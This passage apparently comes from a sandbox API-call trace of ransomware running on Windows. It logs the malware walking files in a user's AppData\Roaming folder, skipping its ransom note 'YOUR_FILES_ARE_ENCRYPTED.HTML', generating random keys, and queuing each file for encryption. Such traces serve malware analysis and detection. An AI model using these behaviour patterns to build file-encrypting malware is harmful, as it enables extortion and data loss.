param_1=0x19ea12, param_2="%02X" | out: param_1="4E") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="07") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="E0") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B0") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="4B") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F8") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="4E") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="86") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="7F") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="BC") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D8") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="D1") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="F5") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="44") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="BF") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E2") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="30") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="71") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="6F") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="32") returned 2 [0122.797] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="49") returned 2 [0122.798] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods" [0122.798] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.798] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0122.798] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3d14a10, ftCreationTime.dwHighDateTime=0x1d7059a, ftLastAccessTime.dwLowDateTime=0x45558580, ftLastAccessTime.dwHighDateTime=0x1d7081f, ftLastWriteTime.dwLowDateTime=0x45558580, ftLastWriteTime.dwHighDateTime=0x1d7081f, nFileSizeHigh=0x0, nFileSizeLow=0x1864e, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="DkNzyLs-PuR.csv", cAlternateFileName="DKNZYL~1.CSV")) returned 1 [0122.798] StrStrIW (lpFirst="DkNzyLs-PuR.csv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.798] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv") returned 57 [0122.798] PathFindExtensionW (pszPath="DkNzyLs-PuR.csv") returned=".csv" [0122.798] lstrlenW (lpString=".csv") returned 4 [0122.798] PathFindExtensionW (pszPath="DkNzyLs-PuR.csv") returned=".csv" [0122.798] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\dknzyls-pur.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.800] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=99918) returned 1 [0122.800] GetProcessHeap () returned 0x600000 [0122.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.803] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="1E") returned 2 [0122.803] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="DC") returned 2 [0122.803] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="FF") returned 2 [0122.803] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="CF") returned 2 [0122.803] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="5C") returned 2 [0122.804] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B7") returned 2 [0122.804] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="05") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="24") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="60") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="75") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="61") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="20") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="FF") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="6A") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="10") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="06") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="D8") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="12") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="42") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="36") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="33") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="70") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="13") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="0E") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="72") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="2A") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="81") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="8F") returned 2 [0122.804] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="41") returned 2 [0122.805] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="BA") returned 2 [0122.805] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="8A") returned 2 [0122.805] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7A") returned 2 [0122.806] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DkNzyLs-PuR.csv" [0122.806] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.806] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.806] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b085dc0, ftCreationTime.dwHighDateTime=0x1d6fd5c, ftLastAccessTime.dwLowDateTime=0x4543dab0, ftLastAccessTime.dwHighDateTime=0x1d6fffa, ftLastWriteTime.dwLowDateTime=0x4543dab0, ftLastWriteTime.dwHighDateTime=0x1d6fffa, nFileSizeHigh=0x0, nFileSizeLow=0x16b5f, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="f5 r4Tx3mN.bmp", cAlternateFileName="F5R4TX~1.BMP")) returned 1 [0122.806] StrStrIW (lpFirst="f5 r4Tx3mN.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.806] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp") returned 56 [0122.806] PathFindExtensionW (pszPath="f5 r4Tx3mN.bmp") returned=".bmp" [0122.806] lstrlenW (lpString=".bmp") returned 4 [0122.806] PathFindExtensionW (pszPath="f5 r4Tx3mN.bmp") returned=".bmp" [0122.806] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\f5 r4tx3mn.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0122.807] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=93023) returned 1 [0122.808] GetProcessHeap () returned 0x600000 [0122.808] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0122.811] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="F4") returned 2 [0122.811] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="16") returned 2 [0122.811] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="66") returned 2 [0122.811] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="CD") returned 2 [0122.811] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="61") returned 2 [0122.811] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="6F") returned 2 [0122.811] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="43") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="96") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="C5") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="74") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="E1") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="F1") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="35") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="B5") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A0") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="22") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="84") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="41") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="1E") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="8E") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="45") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="69") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="A9") returned 2 [0122.811] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="B0") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="B2") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="4F") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="30") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="37") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="81") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="90") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="0E") returned 2 [0122.812] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4D") returned 2 [0122.860] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp" [0122.860] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.860] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0122.860] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc42d40, ftCreationTime.dwHighDateTime=0x1d702fe, ftLastAccessTime.dwLowDateTime=0x54a1070, ftLastAccessTime.dwHighDateTime=0x1d709cb, ftLastWriteTime.dwLowDateTime=0x54a1070, ftLastWriteTime.dwHighDateTime=0x1d709cb, nFileSizeHigh=0x0, nFileSizeLow=0x1442a, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="IRhvCWzuLG.swf", cAlternateFileName="IRHVCW~1.SWF")) returned 1 [0122.860] StrStrIW (lpFirst="IRhvCWzuLG.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.860] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\IRhvCWzuLG.swf") returned 56 [0122.860] PathFindExtensionW (pszPath="IRhvCWzuLG.swf") returned=".swf" [0122.861] lstrlenW (lpString=".swf") returned 4 [0122.861] PathFindExtensionW (pszPath="IRhvCWzuLG.swf") returned=".swf" [0122.861] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6459c080, ftCreationTime.dwHighDateTime=0x1d6fab0, ftLastAccessTime.dwLowDateTime=0x6e108cd0, ftLastAccessTime.dwHighDateTime=0x1d70924, ftLastWriteTime.dwLowDateTime=0x6e108cd0, ftLastWriteTime.dwHighDateTime=0x1d70924, nFileSizeHigh=0x0, nFileSizeLow=0x16bd7, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Jcu58RMwAYmo4QkE4aIS.swf", cAlternateFileName="JCU58R~1.SWF")) returned 1 [0122.861] StrStrIW (lpFirst="Jcu58RMwAYmo4QkE4aIS.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.861] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jcu58RMwAYmo4QkE4aIS.swf") returned 66 [0122.861] PathFindExtensionW (pszPath="Jcu58RMwAYmo4QkE4aIS.swf") returned=".swf" [0122.861] lstrlenW (lpString=".swf") returned 4 [0122.861] PathFindExtensionW (pszPath="Jcu58RMwAYmo4QkE4aIS.swf") returned=".swf" [0122.861] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af9b500, ftCreationTime.dwHighDateTime=0x1d707b3, ftLastAccessTime.dwLowDateTime=0xcdffe8d0, ftLastAccessTime.dwHighDateTime=0x1d709ff, ftLastWriteTime.dwLowDateTime=0xcdffe8d0, ftLastWriteTime.dwHighDateTime=0x1d709ff, nFileSizeHigh=0x0, nFileSizeLow=0x25b8, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Jede3apq.m4a", cAlternateFileName="")) returned 1 [0122.861] StrStrIW (lpFirst="Jede3apq.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.861] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a") returned 54 [0122.861] PathFindExtensionW (pszPath="Jede3apq.m4a") returned=".m4a" [0122.861] lstrlenW (lpString=".m4a") returned 4 [0122.861] PathFindExtensionW (pszPath="Jede3apq.m4a") returned=".m4a" [0122.861] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jede3apq.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.862] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=9656) returned 1 [0122.862] GetProcessHeap () returned 0x600000 [0122.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.866] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="2A") returned 2 [0122.866] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="73") returned 2 [0122.866] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="95") returned 2 [0122.866] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="07") returned 2 [0122.866] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="AD") returned 2 [0122.866] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="ED") returned 2 [0122.866] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="45") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="80") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="2E") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="0A") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="5C") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="08") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="26") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="31") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="4E") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="5A") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="A0") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="E3") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="8C") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="BA") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="4C") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9C") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="38") returned 2 [0122.866] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="22") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="0D") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="98") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E0") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="83") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="31") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="85") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="68") returned 2 [0122.867] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="72") returned 2 [0122.868] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Jede3apq.m4a" [0122.868] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.868] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.873] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16746770, ftCreationTime.dwHighDateTime=0x1d70222, ftLastAccessTime.dwLowDateTime=0x92279420, ftLastAccessTime.dwHighDateTime=0x1d70950, ftLastWriteTime.dwLowDateTime=0x92279420, ftLastWriteTime.dwHighDateTime=0x1d70950, nFileSizeHigh=0x0, nFileSizeLow=0x1fdf, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="ks2RWZ.mp3", cAlternateFileName="")) returned 1 [0122.873] StrStrIW (lpFirst="ks2RWZ.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.873] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3") returned 52 [0122.873] PathFindExtensionW (pszPath="ks2RWZ.mp3") returned=".mp3" [0122.873] lstrlenW (lpString=".mp3") returned 4 [0122.873] PathFindExtensionW (pszPath="ks2RWZ.mp3") returned=".mp3" [0122.873] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ks2rwz.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.874] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=8159) returned 1 [0122.874] GetProcessHeap () returned 0x600000 [0122.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.875] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="12") returned 2 [0122.875] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="FF") returned 2 [0122.875] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="40") returned 2 [0122.875] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="21") returned 2 [0122.875] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="93") returned 2 [0122.875] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="55") returned 2 [0122.875] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="1D") returned 2 [0122.875] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="8A") returned 2 [0122.875] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="B3") returned 2 [0122.875] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="FE") returned 2 [0122.875] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="20") returned 2 [0122.875] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="63") returned 2 [0122.875] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="93") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="58") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="C8") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="D1") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="CA") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A5") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="08") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="40") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="17") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="35") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="EA") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="71") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="C6") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="FA") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="EE") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="37") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="81") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="98") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="0A") returned 2 [0122.876] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="44") returned 2 [0122.878] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ks2RWZ.mp3" [0122.879] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.879] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.883] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d2c080, ftCreationTime.dwHighDateTime=0x1d70486, ftLastAccessTime.dwLowDateTime=0x3b3c42c0, ftLastAccessTime.dwHighDateTime=0x1d707e1, ftLastWriteTime.dwLowDateTime=0x3b3c42c0, ftLastWriteTime.dwHighDateTime=0x1d707e1, 